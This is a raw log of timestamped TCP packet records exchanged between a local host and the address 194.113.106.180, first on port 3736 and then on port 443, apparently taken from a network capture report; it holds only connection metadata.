Sep 15, 2024 15:02:52.996057987 CEST	3736	49707	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:52.996104002 CEST	49707	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:52.996527910 CEST	3736	49707	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:52.996556997 CEST	3736	49707	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:52.996579885 CEST	49707	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:52.996978998 CEST	3736	49707	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:52.996990919 CEST	3736	49707	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:52.997003078 CEST	3736	49707	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:52.997039080 CEST	49707	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:52.997138023 CEST	49707	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:52.997430086 CEST	3736	49707	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:52.997489929 CEST	3736	49707	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:52.997656107 CEST	3736	49707	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:52.997656107 CEST	49707	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:52.997731924 CEST	3736	49707	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:52.997803926 CEST	49707	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:52.998083115 CEST	3736	49707	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:52.998095989 CEST	3736	49707	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:52.998173952 CEST	49707	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:52.998367071 CEST	3736	49707	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:52.998532057 CEST	3736	49707	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:52.998662949 CEST	49707	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:52.998711109 CEST	3736	49707	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:52.998748064 CEST	3736	49707	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:52.998821974 CEST	49707	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:52.999751091 CEST	3736	49707	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:52.999763012 CEST	3736	49707	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:52.999775887 CEST	3736	49707	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:52.999809027 CEST	3736	49707	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:52.999820948 CEST	3736	49707	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:52.999829054 CEST	49707	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:52.999835014 CEST	3736	49707	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:52.999871016 CEST	49707	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:52.999871016 CEST	49707	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:53.000490904 CEST	3736	49707	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:53.000502110 CEST	3736	49707	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:53.000513077 CEST	3736	49707	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:53.000547886 CEST	3736	49707	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:53.000559092 CEST	3736	49707	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:53.000569105 CEST	3736	49707	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:53.000586033 CEST	3736	49707	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:53.000593901 CEST	49707	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:53.000595093 CEST	49707	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:53.000598907 CEST	3736	49707	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:53.000612020 CEST	3736	49707	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:53.000631094 CEST	3736	49707	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:53.000639915 CEST	49707	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:53.000673056 CEST	49707	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:53.000711918 CEST	49707	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:53.000813961 CEST	3736	49707	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:53.000849962 CEST	3736	49707	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:53.001002073 CEST	49707	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:53.003863096 CEST	3736	49707	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:53.003928900 CEST	3736	49707	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:53.003940105 CEST	3736	49707	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:53.004072905 CEST	49707	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:53.007911921 CEST	3736	49707	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:53.007925987 CEST	3736	49707	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:53.007936954 CEST	3736	49707	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:53.008001089 CEST	49707	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:53.008001089 CEST	49707	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:53.017263889 CEST	3736	49707	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:53.017344952 CEST	3736	49707	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:53.017362118 CEST	3736	49707	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:53.017374992 CEST	3736	49707	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:53.017385960 CEST	3736	49707	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:53.017405033 CEST	49707	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:53.017429113 CEST	49707	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:53.019579887 CEST	3736	49707	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:53.019592047 CEST	3736	49707	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:53.019602060 CEST	3736	49707	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:53.019665956 CEST	49707	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:53.019666910 CEST	49707	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:53.022942066 CEST	3736	49707	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:53.022952080 CEST	3736	49707	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:53.023039103 CEST	3736	49707	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:53.023041010 CEST	49707	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:53.023049116 CEST	3736	49707	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:53.023178101 CEST	49707	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:53.026849985 CEST	3736	49707	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:53.026859999 CEST	3736	49707	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:53.026874065 CEST	3736	49707	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:53.026927948 CEST	3736	49707	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:53.026976109 CEST	49707	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:53.026977062 CEST	49707	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:53.030771971 CEST	3736	49707	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:53.030798912 CEST	3736	49707	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:53.030808926 CEST	3736	49707	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:53.030821085 CEST	3736	49707	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:53.030893087 CEST	49707	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:53.030893087 CEST	49707	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:53.032454967 CEST	3736	49707	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:53.032480955 CEST	3736	49707	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:53.032517910 CEST	3736	49707	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:53.032527924 CEST	3736	49707	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:53.032547951 CEST	49707	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:53.032593012 CEST	49707	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:53.034157991 CEST	3736	49707	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:53.034169912 CEST	3736	49707	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:53.034183025 CEST	3736	49707	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:53.034281015 CEST	49707	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:53.036166906 CEST	3736	49707	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:53.036186934 CEST	3736	49707	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:53.036197901 CEST	3736	49707	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:53.036253929 CEST	49707	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:53.036253929 CEST	49707	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:53.037861109 CEST	3736	49707	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:53.037911892 CEST	3736	49707	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:53.037921906 CEST	3736	49707	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:53.037933111 CEST	3736	49707	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:53.037965059 CEST	49707	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:53.037996054 CEST	49707	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:53.039830923 CEST	3736	49707	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:53.039843082 CEST	3736	49707	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:53.039854050 CEST	3736	49707	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:53.039901972 CEST	49707	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:53.043107986 CEST	3736	49707	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:53.043178082 CEST	3736	49707	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:53.043188095 CEST	3736	49707	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:53.043234110 CEST	49707	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:53.043234110 CEST	49707	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:53.043780088 CEST	3736	49707	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:53.043790102 CEST	3736	49707	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:53.043816090 CEST	3736	49707	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:53.043874025 CEST	49707	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:53.045685053 CEST	3736	49707	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:53.045722961 CEST	3736	49707	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:53.045733929 CEST	3736	49707	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:53.045757055 CEST	49707	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:53.045808077 CEST	49707	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:53.047739983 CEST	3736	49707	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:53.047753096 CEST	3736	49707	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:53.047763109 CEST	3736	49707	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:53.047852039 CEST	49707	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:53.049694061 CEST	3736	49707	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:53.049711943 CEST	3736	49707	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:53.049721956 CEST	3736	49707	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:53.049761057 CEST	49707	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:53.049797058 CEST	49707	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:53.051451921 CEST	3736	49707	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:53.051481009 CEST	3736	49707	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:53.051584959 CEST	3736	49707	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:53.051597118 CEST	3736	49707	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:53.051611900 CEST	49707	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:53.051644087 CEST	49707	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:53.053343058 CEST	3736	49707	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:53.053353071 CEST	3736	49707	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:53.053364038 CEST	3736	49707	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:53.053420067 CEST	49707	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:53.055457115 CEST	3736	49707	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:53.055515051 CEST	3736	49707	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:53.055522919 CEST	49707	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:53.055526018 CEST	3736	49707	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:53.055537939 CEST	3736	49707	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:53.055569887 CEST	49707	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:53.057216883 CEST	3736	49707	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:53.057291031 CEST	3736	49707	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:53.057301044 CEST	3736	49707	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:53.057311058 CEST	3736	49707	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:53.057333946 CEST	49707	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:53.057333946 CEST	49707	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:53.059178114 CEST	3736	49707	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:53.059199095 CEST	3736	49707	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:53.059210062 CEST	3736	49707	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:53.059252977 CEST	49707	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:53.059252977 CEST	49707	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:53.062423944 CEST	3736	49707	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:53.062482119 CEST	3736	49707	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:53.062494040 CEST	3736	49707	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:53.062542915 CEST	49707	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:53.063532114 CEST	3736	49707	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:53.063549995 CEST	3736	49707	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:53.063611031 CEST	49707	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:53.063652039 CEST	3736	49707	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:53.063668013 CEST	3736	49707	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:53.063745975 CEST	49707	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:53.064884901 CEST	3736	49707	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:53.064897060 CEST	3736	49707	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:53.064908028 CEST	3736	49707	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:53.064958096 CEST	49707	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:53.064958096 CEST	49707	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:53.066788912 CEST	3736	49707	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:53.066801071 CEST	3736	49707	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:53.066812038 CEST	3736	49707	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:53.066845894 CEST	49707	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:53.069037914 CEST	3736	49707	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:53.069092989 CEST	49707	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:53.069204092 CEST	3736	49707	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:53.069215059 CEST	3736	49707	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:53.069294930 CEST	49707	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:53.071821928 CEST	3736	49707	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:53.071890116 CEST	3736	49707	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:53.071901083 CEST	3736	49707	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:53.071912050 CEST	3736	49707	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:53.071963072 CEST	49707	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:53.071963072 CEST	49707	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:53.072694063 CEST	3736	49707	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:53.072803974 CEST	3736	49707	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:53.072839022 CEST	3736	49707	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:53.072863102 CEST	49707	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:53.072875977 CEST	3736	49707	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:53.072982073 CEST	49707	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:53.075115919 CEST	3736	49707	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:53.075135946 CEST	3736	49707	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:53.075148106 CEST	3736	49707	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:53.075216055 CEST	49707	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:53.077409029 CEST	3736	49707	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:53.077420950 CEST	3736	49707	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:53.077430964 CEST	3736	49707	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:53.077480078 CEST	49707	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:53.077480078 CEST	49707	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:53.078387022 CEST	3736	49707	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:53.078430891 CEST	3736	49707	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:53.078442097 CEST	3736	49707	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:53.078551054 CEST	49707	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:53.082581043 CEST	3736	49707	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:53.082653999 CEST	49707	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:53.284050941 CEST	49707	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:53.288997889 CEST	3736	49707	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:53.289060116 CEST	49707	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:53.294069052 CEST	3736	49707	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:53.658864975 CEST	3736	49707	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:53.658958912 CEST	3736	49707	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:53.658974886 CEST	3736	49707	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:53.658986092 CEST	3736	49707	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:53.659008026 CEST	49707	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:53.659060955 CEST	49707	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:53.660561085 CEST	3736	49707	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:53.660578966 CEST	3736	49707	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:53.660590887 CEST	3736	49707	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:53.660602093 CEST	3736	49707	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:53.660654068 CEST	49707	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:53.660674095 CEST	49707	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:53.661490917 CEST	3736	49707	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:53.661503077 CEST	3736	49707	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:53.661513090 CEST	3736	49707	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:53.661580086 CEST	49707	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:53.662514925 CEST	3736	49707	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:53.662564993 CEST	49707	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:53.662580967 CEST	3736	49707	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:53.662591934 CEST	3736	49707	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:53.662697077 CEST	49707	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:53.663568020 CEST	3736	49707	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:53.663621902 CEST	3736	49707	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:53.663631916 CEST	3736	49707	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:53.663642883 CEST	3736	49707	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:53.663681984 CEST	49707	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:53.663732052 CEST	49707	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:53.664560080 CEST	3736	49707	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:53.664581060 CEST	3736	49707	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:53.664591074 CEST	3736	49707	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:53.664601088 CEST	3736	49707	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:53.664625883 CEST	49707	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:53.664671898 CEST	49707	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:53.665669918 CEST	3736	49707	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:53.665673018 CEST	3736	49707	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:53.665678024 CEST	3736	49707	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:53.665724993 CEST	49707	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:53.666595936 CEST	3736	49707	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:53.666618109 CEST	3736	49707	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:53.666627884 CEST	3736	49707	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:53.666646957 CEST	49707	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:53.666681051 CEST	49707	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:53.762804985 CEST	49707	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:53.767663956 CEST	3736	49707	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:53.767721891 CEST	49707	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:53.773205042 CEST	3736	49707	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:54.135236025 CEST	3736	49707	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:54.135507107 CEST	49707	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:54.135507107 CEST	49707	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:54.136024952 CEST	3736	49707	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:54.136094093 CEST	49707	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:54.136358976 CEST	3736	49707	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:54.136437893 CEST	49707	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:54.140620947 CEST	3736	49707	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:54.140633106 CEST	3736	49707	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:54.227015972 CEST	49708	443	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:54.227054119 CEST	443	49708	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:54.227253914 CEST	49708	443	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:54.227253914 CEST	49708	443	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:54.227282047 CEST	443	49708	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:55.092993975 CEST	443	49708	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:55.093199968 CEST	49708	443	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:55.097696066 CEST	49708	443	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:55.097703934 CEST	443	49708	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:55.098084927 CEST	443	49708	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:55.099797964 CEST	49708	443	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:55.147407055 CEST	443	49708	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:59.852535963 CEST	443	49708	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:59.852700949 CEST	443	49708	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:59.852817059 CEST	49708	443	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:59.852852106 CEST	49708	443	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:59.852871895 CEST	443	49708	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:59.852927923 CEST	49708	443	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:59.852935076 CEST	443	49708	194.113.106.180	192.168.2.10
Sep 15, 2024 15:03:00.851676941 CEST	49709	443	192.168.2.10	194.113.106.180
Sep 15, 2024 15:03:00.851722002 CEST	443	49709	194.113.106.180	192.168.2.10
Sep 15, 2024 15:03:00.851902962 CEST	49709	443	192.168.2.10	194.113.106.180
Sep 15, 2024 15:03:00.851969004 CEST	49709	443	192.168.2.10	194.113.106.180
Sep 15, 2024 15:03:00.851974964 CEST	443	49709	194.113.106.180	192.168.2.10
Sep 15, 2024 15:03:01.676474094 CEST	443	49709	194.113.106.180	192.168.2.10
Sep 15, 2024 15:03:01.676734924 CEST	49709	443	192.168.2.10	194.113.106.180
Sep 15, 2024 15:03:01.712893963 CEST	49709	443	192.168.2.10	194.113.106.180
Sep 15, 2024 15:03:01.712919950 CEST	443	49709	194.113.106.180	192.168.2.10
Sep 15, 2024 15:03:01.713862896 CEST	443	49709	194.113.106.180	192.168.2.10
Sep 15, 2024 15:03:01.714553118 CEST	49709	443	192.168.2.10	194.113.106.180
Sep 15, 2024 15:03:01.759413004 CEST	443	49709	194.113.106.180	192.168.2.10
Sep 15, 2024 15:03:06.456831932 CEST	443	49709	194.113.106.180	192.168.2.10
Sep 15, 2024 15:03:06.456909895 CEST	443	49709	194.113.106.180	192.168.2.10
Sep 15, 2024 15:03:06.456980944 CEST	49709	443	192.168.2.10	194.113.106.180
Sep 15, 2024 15:03:06.457175970 CEST	49709	443	192.168.2.10	194.113.106.180
Sep 15, 2024 15:03:06.457194090 CEST	443	49709	194.113.106.180	192.168.2.10
Sep 15, 2024 15:03:06.457240105 CEST	49709	443	192.168.2.10	194.113.106.180
Sep 15, 2024 15:03:06.457245111 CEST	443	49709	194.113.106.180	192.168.2.10
Sep 15, 2024 15:03:07.461769104 CEST	49710	443	192.168.2.10	194.113.106.180
Sep 15, 2024 15:03:07.461838007 CEST	443	49710	194.113.106.180	192.168.2.10
Sep 15, 2024 15:03:07.461951971 CEST	49710	443	192.168.2.10	194.113.106.180
Sep 15, 2024 15:03:07.462275028 CEST	49710	443	192.168.2.10	194.113.106.180
Sep 15, 2024 15:03:07.462290049 CEST	443	49710	194.113.106.180	192.168.2.10
Sep 15, 2024 15:03:08.189023018 CEST	443	49710	194.113.106.180	192.168.2.10
Sep 15, 2024 15:03:08.189258099 CEST	49710	443	192.168.2.10	194.113.106.180
Sep 15, 2024 15:03:08.193345070 CEST	49710	443	192.168.2.10	194.113.106.180
Sep 15, 2024 15:03:08.193358898 CEST	443	49710	194.113.106.180	192.168.2.10
Sep 15, 2024 15:03:08.193643093 CEST	443	49710	194.113.106.180	192.168.2.10
Sep 15, 2024 15:03:08.194391012 CEST	49710	443	192.168.2.10	194.113.106.180
Sep 15, 2024 15:03:08.239403963 CEST	443	49710	194.113.106.180	192.168.2.10
Sep 15, 2024 15:03:13.097177982 CEST	443	49710	194.113.106.180	192.168.2.10
